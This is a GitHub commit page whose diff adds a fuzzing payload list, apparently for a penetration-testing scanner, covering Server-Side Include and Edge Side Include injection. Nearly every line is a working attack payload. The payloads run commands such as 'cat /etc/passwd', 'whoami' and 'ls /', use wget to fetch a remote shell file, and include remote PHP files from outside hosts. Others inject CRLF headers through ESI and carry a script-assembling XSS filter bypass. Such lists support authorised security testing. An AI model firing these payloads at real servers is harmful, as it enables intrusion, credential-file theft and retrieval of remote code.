-
-
Notifications
You must be signed in to change notification settings - Fork 14.7k
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
1 parent
98cfc9c
commit 0108d01
Showing
2 changed files
with
140 additions
and
7 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,92 @@ | ||
<!--#config errmsg="File not found, informs users and password"--> | ||
<!--#config timefmt="A %B %d %Y %r"--> | ||
<!--#echo var="DATE_LOCAL" --> | ||
<!--#echo var="DOCUMENT_NAME" --> | ||
<!--#echo var="DOCUMENT_URI" --> | ||
<!--#echo var="auth_type" --> | ||
<!--#echo var="content_length" --> | ||
<!--#echo var="content_type" --> | ||
<!--#echo var="date_gmt" --> | ||
<!--#echo var="date_local" --> | ||
<!--#echo var="document_name" --> | ||
<!--#echo var="document_root" --> | ||
<!--#echo var="document_uri" --> | ||
<!--#echo var="forwarded" --> | ||
<!--#echo var="from" --> | ||
<!--#echo var="gateway_interface" --> | ||
<!--#echo var="http_accept" --> | ||
<!--#echo var="http_accept_charset" --> | ||
<!--#echo var="http_accept_encoding" --> | ||
<!--#echo var="http_accept_language" --> | ||
<!--#echo var="http_client_ip" --> | ||
<!--#echo var="http_connection" --> | ||
<!--#echo var="http_cookie" --> | ||
<!--#echo var="http_form" --> | ||
<!--#echo var="http_host" --> | ||
<!--#echo var="http_referer" --> | ||
<!--#echo var="http_ua_cpu" --> | ||
<!--#echo var="http_ua_os" --> | ||
<!--#echo var="http_user_agent" --> | ||
<!--#echo var="last_modified" --> | ||
<!--#echo var="netsite_root" --> | ||
<!--#echo var="page_count" --> | ||
<!--#echo var="path" --> | ||
<!--#echo var="path_info" --> | ||
<!--#echo var="path_info_translated" --> | ||
<!--#echo var="path_translated" --> | ||
<!--#echo var="query_string" --> | ||
<!--#echo var="query_string_unescaped" --> | ||
<!--#echo var="remote_addr" --> | ||
<!--#echo var="remote_host" --> | ||
<!--#echo var="remote_ident" --> | ||
<!--#echo var="remote_port" --> | ||
<!--#echo var="remote_user" --> | ||
<!--#echo var="request_method" --> | ||
<!--#echo var="request_uri" --> | ||
<!--#echo var="script_filename" --> | ||
<!--#echo var="script_name" --> | ||
<!--#echo var="script_uri" --> | ||
<!--#echo var="script_url" --> | ||
<!--#echo var="server_addr" --> | ||
<!--#echo var="server_admin" --> | ||
<!--#echo var="server_name --> | ||
<!--#echo var="server_port" --> | ||
<!--#echo var="server_protocol" --> | ||
<!--#echo var="server_software" --> | ||
<!--#echo var="site_htmlroot" --> | ||
<!--#echo var="total_hits" --> | ||
<!--#echo var="tz" --> | ||
<!--#echo var="unique_id" --> | ||
<!--#echo var="user_name" --> | ||
<!--#exec cmd="/bin/ls /" --> | ||
<!--#exec cmd="cat /etc/passwd" --> | ||
<!--#exec cmd="cd C:\WINDOWS\System32"> | ||
<!--#exec cmd="curl http://sn1persecurity.com/.testing/rfi_vuln.php" --> | ||
<!--#exec cmd="dir" --> | ||
<!--#exec cmd="ipconfig" --> | ||
<!--#exec cmd="ls" --> | ||
<!--#exec cmd="perl -e 'print "X"*5000'" --> | ||
<!--#exec cmd="sleep 10" --> | ||
<!--#exec cmd="sleep 5" --> | ||
<!--#exec cmd="uname" --> | ||
<!--#exec cmd="wget http://website.com/dir/shell.txt" --> | ||
<!--#exec cmd="whoami" --> | ||
<!--#exec cmd="whoami"--> | ||
<!--#flastmod virtual="echo.html" --> | ||
<!--#fsize file="ssi.shtml" --> | ||
<!--#include file=?UUUUUUUU...UU?--> | ||
<!--#include virtual="/" --> | ||
<!--#include virtual="/index.html" --> | ||
<!--#include virtual="http://sn1persecurity.com/.testing/rfi_vuln.php" --> | ||
<!--#include virtual="https://crowdshield.com/.testing/rfi_vuln.php" --> | ||
<!--#printenv --> | ||
</nowiki> | ||
<esi:debug/> | ||
<esi:include src="http://google.com%0d%0aX-Forwarded-For:%20127.0.0.1%0d%0aJunkHeader:%20JunkValue/"/> | ||
<esi:include src="http://host/poc.xml" dca="xslt" stylesheet="http://google.com/poc.xsl" /> | ||
<esi:include src=http://google.com/> | ||
<pre><!--#echo var="DATE_LOCAL" --> </pre> | ||
<pre><!--#exec cmd="dir" --></pre> | ||
<pre><!--#exec cmd="ls" --></pre> | ||
<pre><!--#exec cmd="whoami"--></pre> | ||
x=<esi:assign name="var1" value="'cript'"/><s<esi:vars name="$(var1)"/>>alert(/Chrome%20XSS%20filter%20bypass/);</s<esi:vars name="$(var1)"/>> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters